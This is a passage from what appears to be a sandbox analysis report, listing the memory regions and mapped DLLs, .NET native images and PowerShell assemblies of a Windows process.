filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1395
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1396
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1397
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1398
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1399
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1400
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1401
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1402
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1403
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1404
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1448
start_va = 0x1d0000
end_va = 0x1dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1449
start_va = 0x1b40000
end_va = 0x1c3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b40000"
filename = ""
Region:
id = 1450
start_va = 0x1da0000
end_va = 0x1e1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001da0000"
filename = ""
Region:
id = 1451
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1452
start_va = 0x7fefb560000
end_va = 0x7fefb5b5fff
entry_point = 0x7fefb56bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1457
start_va = 0x190000
end_va = 0x190fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 1458
start_va = 0x1a0000
end_va = 0x1a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1459
start_va = 0x1cf0000
end_va = 0x1d6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001cf0000"
filename = ""
Region:
id = 1460
start_va = 0x1e20000
end_va = 0x1efefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e20000"
filename = ""
Region:
id = 1461
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1462
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe8ccebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1486
start_va = 0x1b0000
end_va = 0x1b1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 1487
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 1488
start_va = 0x1e0000
end_va = 0x1e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1489
start_va = 0x1f00000
end_va = 0x21cefff
entry_point = 0x1f00000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1490
start_va = 0x22b0000
end_va = 0x232ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000022b0000"
filename = ""
Region:
id = 1491
start_va = 0x7fefc060000
end_va = 0x7fefc253fff
entry_point = 0x7fefc1ec924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1492
start_va = 0x7fefc4e0000
end_va = 0x7fefc60bfff
entry_point = 0x7fefc4e94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1493
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
entry_point = 0x7fefcaf13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1494
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1495
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1514
start_va = 0x210000
end_va = 0x210fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 1515
start_va = 0x1c40000
end_va = 0x1c5efff
entry_point = 0x1c40000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db")
Region:
id = 1516
start_va = 0x2330000
end_va = 0x2722fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002330000"
filename = ""
Region:
id = 1517
start_va = 0x2780000
end_va = 0x27fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 1518
start_va = 0x7fef61a0000
end_va = 0x7fef61d3fff
entry_point = 0x7fef61a1890
region_type = mapped_file
name = "shdocvw.dll"
filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll")
Region:
id = 1519
start_va = 0x7fef91c0000
end_va = 0x7fef9216fff
entry_point = 0x7fef91c1118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1520
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1521
start_va = 0x7fefd9b0000
end_va = 0x7fefd9c9fff
entry_point = 0x7fefd9b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1522
start_va = 0x7fefda40000
end_va = 0x7fefda75fff
entry_point = 0x7fefda41474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1523
start_va = 0x7fefdb70000
end_va = 0x7fefdd46fff
entry_point = 0x7fefdb71010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1524
start_va = 0x7fefe7f0000
end_va = 0x7fefe841fff
entry_point = 0x7fefe7f10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1525
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1584
start_va = 0x1f0000
end_va = 0x1f3fff
entry_point = 0x1f0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1585
start_va = 0x1c60000
end_va = 0x1c8ffff
entry_point = 0x1c60000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db")
Region:
id = 1586
start_va = 0x1c90000
end_va = 0x1c93fff
entry_point = 0x1c90000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1587
start_va = 0x21d0000
end_va = 0x2235fff
entry_point = 0x21d0000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1588
start_va = 0x2880000
end_va = 0x28fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 1589
start_va = 0x7fef6190000
end_va = 0x7fef619bfff
entry_point = 0x7fef6191380
region_type = mapped_file
name = "linkinfo.dll"
filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")
Region:
id = 1590
start_va = 0x7fef7b70000
end_va = 0x7fef7beffff
entry_point = 0x7fef7b74a8c
region_type = mapped_file
name = "ntshrui.dll"
filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")
Region:
id = 1591
start_va = 0x7fef7bf0000
end_va = 0x7fef7bfefff
entry_point = 0x7fef7bf1040
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 1592
start_va = 0x7fefbee0000
end_va = 0x7fefbeeafff
entry_point = 0x7fefbee4f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 1593
start_va = 0x7fefd540000
end_va = 0x7fefd562fff
entry_point = 0x7fefd541198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1594
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1595
start_va = 0x7fef13f0000
end_va = 0x7fef1488fff
entry_point = 0x7fef13f2670
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 1596
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1597
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1598
start_va = 0x1ca0000
end_va = 0x1ca0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ca0000"
filename = ""
Region:
id = 1599
start_va = 0x29e0000
end_va = 0x29effff
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 1600
start_va = 0x2ae0000
end_va = 0x2b5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ae0000"
filename = ""
Region:
id = 1601
start_va = 0x2b60000
end_va = 0x2c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b60000"
filename = ""
Region:
id = 1602
start_va = 0x75360000
end_va = 0x75428fff
entry_point = 0x75362df0
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll")
Region:
id = 1603
start_va = 0x7fee38d0000
end_va = 0x7fee426cfff
entry_point = 0x7fee3d1a300
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll")
Region:
id = 1604
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1621
start_va = 0x1cb0000
end_va = 0x1cb2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cb0000"
filename = ""
Region:
id = 1622
start_va = 0x1cc0000
end_va = 0x1cc0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cc0000"
filename = ""
Region:
id = 1623
start_va = 0x1d80000
end_va = 0x1d9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d80000"
filename = ""
Region:
id = 1624
start_va = 0x2a10000
end_va = 0x2a8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 1625
start_va = 0x2ca0000
end_va = 0x2d1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ca0000"
filename = ""
Region:
id = 1626
start_va = 0x2d20000
end_va = 0x1ad1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d20000"
filename = ""
Region:
id = 1627
start_va = 0x1ad20000
end_va = 0x1b3effff
entry_point = 0x0
region_type = private
name = "private_0x000000001ad20000"
filename = ""
Region:
id = 1628
start_va = 0x1b3f0000
end_va = 0x1b4f0fff
entry_point = 0x0
region_type = private
name = "private_0x000000001b3f0000"
filename = ""
Region:
id = 1629
start_va = 0x7fee29f0000
end_va = 0x7fee38cbfff
entry_point = 0x7fee29f0000
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll")
Region:
id = 1630
start_va = 0x7ff00020000
end_va = 0x7ff0002ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00020000"
filename = ""
Region:
id = 1631
start_va = 0x7ff00030000
end_va = 0x7ff0003ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00030000"
filename = ""
Region:
id = 1632
start_va = 0x7ff00040000
end_va = 0x7ff000dffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00040000"
filename = ""
Region:
id = 1633
start_va = 0x7ff000e0000
end_va = 0x7ff000effff
entry_point = 0x0
region_type = private
name = "private_0x000007ff000e0000"
filename = ""
Region:
id = 1634
start_va = 0x7ff000f0000
end_va = 0x7ff0015ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff000f0000"
filename = ""
Region:
id = 1635
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1636
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1705
start_va = 0x1cd0000
end_va = 0x1cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001cd0000"
filename = ""
Region:
id = 1706
start_va = 0x1b500000
end_va = 0x1b7e1fff
entry_point = 0x1b500000
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1707
start_va = 0x7fee0230000
end_va = 0x7fee02e1fff
entry_point = 0x7fee0230000
region_type = mapped_file
name = "microsoft.powershell.consolehost.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll")
Region:
id = 1708
start_va = 0x7fee1fc0000
end_va = 0x7fee29e2fff
entry_point = 0x7fee1fc0000
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll")
Region:
id = 1709
start_va = 0x7fffff10000
end_va = 0x7fffff1ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff10000"
filename = ""
Region:
id = 1710
start_va = 0x7fffff20000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff20000"
filename = ""
Region:
id = 1727
start_va = 0x7fedf470000
end_va = 0x7fedffccfff
entry_point = 0x7fedf470000
region_type = mapped_file
name = "system.management.automation.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll")
Region:
id = 1728
start_va = 0x7ff00160000
end_va = 0x7ff0016ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00160000"
filename = ""
Region:
id = 1729
start_va = 0x1ce0000
end_va = 0x1ce2fff
entry_point = 0x1ce0000
region_type = mapped_file
name = "l_intl.nls"
filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls")
Region:
id = 1730
start_va = 0x2900000
end_va = 0x29bffff
entry_point = 0x2900000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1736
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1738
start_va = 0x1d70000
end_va = 0x1d70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d70000"
filename = ""
Region:
id = 1747
start_va = 0x2240000
end_va = 0x2244fff
entry_point = 0x2240000
region_type = mapped_file
name = "sorttbls.nlp"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")
Region:
id = 1748
start_va = 0x2250000
end_va = 0x2290fff
entry_point = 0x2250000
region_type = mapped_file
name = "sortkey.nlp"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")
Region:
id = 1749
start_va = 0x7ff00170000
end_va = 0x7ff0017ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00170000"
filename = ""
Region:
id = 1784
start_va = 0x22a0000
end_va = 0x22a7fff
entry_point = 0x22a302e
region_type = mapped_file
name = "microsoft.wsman.runtime.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll")
Region:
id = 1785
start_va = 0x2730000
end_va = 0x2730fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002730000"
filename = ""
Region:
id = 1786
start_va = 0x2740000
end_va = 0x2740fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002740000"
filename = ""
Region:
id = 1787
start_va = 0x1b7f0000
end_va = 0x1b8effff
entry_point = 0x0
region_type = private
name = "private_0x000000001b7f0000"
filename = ""
Region:
id = 1788
start_va = 0x1e230000
end_va = 0x1e278fff
entry_point = 0x1e2732b8
region_type = mapped_file
name = "system.transactions.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll")
Region:
id = 1789
start_va = 0x642ff4a0000
end_va = 0x642ff4a9fff
entry_point = 0x642ff4a4710
region_type = mapped_file
name = "culture.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll")
Region:
id = 1790
start_va = 0x7fedea50000
end_va = 0x7fedea8dfff
entry_point = 0x7fedea50000
region_type = mapped_file
name = "microsoft.powershell.security.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll")
Region:
id = 1791
start_va = 0x7fedeb40000
end_va = 0x7fedec57fff
entry_point = 0x7fedeb40000
region_type = mapped_file
name = "microsoft.powershell.commands.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll")
Region:
id = 1792
start_va = 0x7fedec60000
end_va = 0x7fedee75fff
entry_point = 0x7fedec60000
region_type = mapped_file
name = "microsoft.powershell.commands.utility.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll")
Region:
id = 1793
start_va = 0x7fedee80000
end_va = 0x7fedef64fff
entry_point = 0x7fedee80000
region_type = mapped_file
name = "system.transactions.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll")
Region:
id = 1794
start_va = 0x7fedef70000
end_va = 0x7fedf019fff
entry_point = 0x7fedef70000
region_type = mapped_file
name = "microsoft.wsman.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll")
Region:
id = 1795
start_va = 0x7fedf020000
end_va = 0x7fedf051fff
entry_point = 0x7fedf020000
region_type = mapped_file
name = "system.configuration.install.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll")
Region:
id = 1796
start_va = 0x7fedf060000
end_va = 0x7fedf0c8fff
entry_point = 0x7fedf060000
region_type = mapped_file
name = "microsoft.powershell.commands.diagnostics.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll")
Region:
id = 1797
start_va = 0x7fedf0d0000
end_va = 0x7fedf3fdfff
entry_point = 0x7fedf0d0000
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll")
Region:
id = 1815
start_va = 0x2800000
end_va = 0x2853fff
entry_point = 0x2800000
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll")
Region:
id = 1816
start_va = 0x7fede4e0000
end_va = 0x7fede674fff
entry_point = 0x7fede4e0000
region_type = mapped_file
name = "system.directoryservices.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll")
Region:
id = 1817
start_va = 0x7fede680000
end_va = 0x7fede7ebfff
entry_point = 0x7fede680000
region_type = mapped_file
name = "system.management.ni.dll"
